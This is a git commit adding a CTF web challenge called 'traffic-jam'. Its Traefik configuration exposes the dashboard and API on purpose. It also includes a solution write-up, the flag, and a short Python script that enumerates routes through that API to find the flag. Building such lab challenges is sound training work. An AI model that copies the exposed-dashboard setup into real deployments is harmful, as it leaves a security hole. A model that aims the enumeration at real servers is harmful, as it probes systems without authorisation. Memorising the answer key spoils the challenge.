feat: add traffic-jam challenge

2024-11-25 22:33:53 +01:00 · 2024-11-25 22:33:53 +01:00 · 9272d086ca
commit 9272d086ca
parent 42ae878989
9 changed files with 3212 additions and 0 deletions
--- a/traffic-jam/Dockerfile.flagservice
+++ b/traffic-jam/Dockerfile.flagservice
@ -0,0 +1,3 @@
+FROM nginx
+
+COPY ./conf/nginx.conf /etc/nginx/templates/default.conf.template
--- a/traffic-jam/Dockerfile.traefik
+++ b/traffic-jam/Dockerfile.traefik
@ -0,0 +1,4 @@
+FROM traefik
+
+COPY ./conf/traefik.yml /etc/traefik/traefik.yml
+COPY ./conf/config.yml /etc/traefik/config/config.yml
--- a/traffic-jam/README.md
+++ b/traffic-jam/README.md
@ -0,0 +1,15 @@
+# traffic-jam
+
+## Text
+
+Did you see Jake Paul vs. Mike Tyson last sunday?
+Appareantly Netflix had some issues.
+Probably an issue with their load balancer if you ask me.
+
+## Files
+
+- Challenge IP
+
+## How to deploy
+
+N.A.
--- a/traffic-jam/SOLUTION.md
+++ b/traffic-jam/SOLUTION.md
@ -0,0 +1,24 @@
+## Difficulty
+
+Medium
+
+## Category
+
+Web
+
+## How to solve
+
+The description hints that a load balancer might have something to do with this challenge.
+When visiting the challenge, a 404 page is returned. This is the return page used by traefik.
+Although there isn't any mention of traefik on the 404 page, the load balancer hint and the name "traffic jam" should enough to realise that traefik is used here.
+
+Traefik has a dashboard page which, if enabled, can be accessed through `/dashboard/`.
+When visiting the dashboard, a lot of routes can be seen. Using traefik's API, which is also publically exposed, we can enumerate all of the routes. Only one route returns a successful response, which contains the flag.
+
+A python script that solves the challenge can be found [here](./solution.py).
+
+## Flag
+
+```
+IGCTF{tra3fik-ftw!}
+```
--- a/traffic-jam/conf/config.yml
+++ b/traffic-jam/conf/config.yml
--- a/traffic-jam/conf/nginx.conf
+++ b/traffic-jam/conf/nginx.conf
@ -0,0 +1,10 @@
+
+server {
+  listen 8080 default_server;
+  server_name _;
+
+  location /${FLAG_RANDOMIZATION} {
+    return 200 "${FLAG}";
+    add_header Content-Type text/plain;
+  }
+}
--- a/traffic-jam/conf/traefik.yml
+++ b/traffic-jam/conf/traefik.yml
@ -0,0 +1,109 @@
+
+################################################################
+# Global configuration
+################################################################
+global:
+  checkNewVersion: false
+  sendAnonymousUsage: false
+
+################################################################
+# EntryPoints configuration
+################################################################
+
+# EntryPoints definition
+#
+# Optional
+#
+entryPoints:
+  web:
+    address: :80
+
+################################################################
+# Traefik logs configuration
+################################################################
+
+# Traefik logs
+# Enabled by default and log to stdout
+#
+# Optional
+#
+# log:
+  # Log level
+  #
+  # Optional
+  # Default: "ERROR"
+  #
+  # level: DEBUG
+
+  # Sets the filepath for the traefik log. If not specified, stdout will be used.
+  # Intermediate directories are created if necessary.
+  #
+  # Optional
+  # Default: os.Stdout
+  #
+#  filePath: log/traefik.log
+
+  # Format is either "json" or "common".
+  #
+  # Optional
+  # Default: "common"
+  #
+#  format: json
+
+################################################################
+# Access logs configuration
+################################################################
+
+# Enable access logs
+# By default it will write to stdout and produce logs in the textual
+# Common Log Format (CLF), extended with additional fields.
+#
+# Optional
+#
+# accessLog:
+  # Sets the file path for the access log. If not specified, stdout will be used.
+  # Intermediate directories are created if necessary.
+  #
+  # Optional
+  # Default: os.Stdout
+  #
+#  filePath: /path/to/log/log.txt
+
+  # Format is either "json" or "common".
+  #
+  # Optional
+  # Default: "common"
+  #
+  # format: common
+
+################################################################
+# API and dashboard configuration
+################################################################
+
+# Enable API and dashboard
+#
+# Optional
+
+api:
+  dashboard: true
+
+################################################################
+# Ping configuration
+################################################################
+
+# Enable ping
+#ping:
+  # Name of the related entry point
+  #
+  # Optional
+  # Default: "traefik"
+  #
+#  entryPoint: traefik
+
+################################################################
+# Docker configuration backend
+################################################################
+
+providers:
+  file:
+    directory: /etc/traefik/config
--- a/traffic-jam/docker-compose.yaml
+++ b/traffic-jam/docker-compose.yaml
@ -0,0 +1,14 @@
+services:
+  traefik:
+    build:
+      dockerfile: Dockerfile.traefik
+    ports:
+      - 3000:80
+
+  flag-service:
+    build:
+      dockerfile: Dockerfile.flagservice
+    environment:
+      - FLAG=IGCTF{tra3fik-ftw!}
+      - FLAG_RANDOMIZATION=flag-65168cca52479c79161d2c189dc733b5
+    network_mode: service:traefik
--- a/traffic-jam/solution.py
+++ b/traffic-jam/solution.py
@ -0,0 +1,20 @@
+from urllib import request
+import json
+
+# Get traefik routes
+response = request.urlopen('http://localhost:3000/api/http/routers?per_page=1000&page=1&serviceName=flag-service@file')
+data = response.read().decode('utf-8')
+response.close()
+
+
+for route in json.loads(data):
+  try:
+    # GET each route
+    with request.urlopen(f"http://localhost:3000/{route['name']}") as response:
+        data = response.read().decode('utf-8')
+        # successful response
+        print(data)
+        break
+  except Exception:
+     pass
+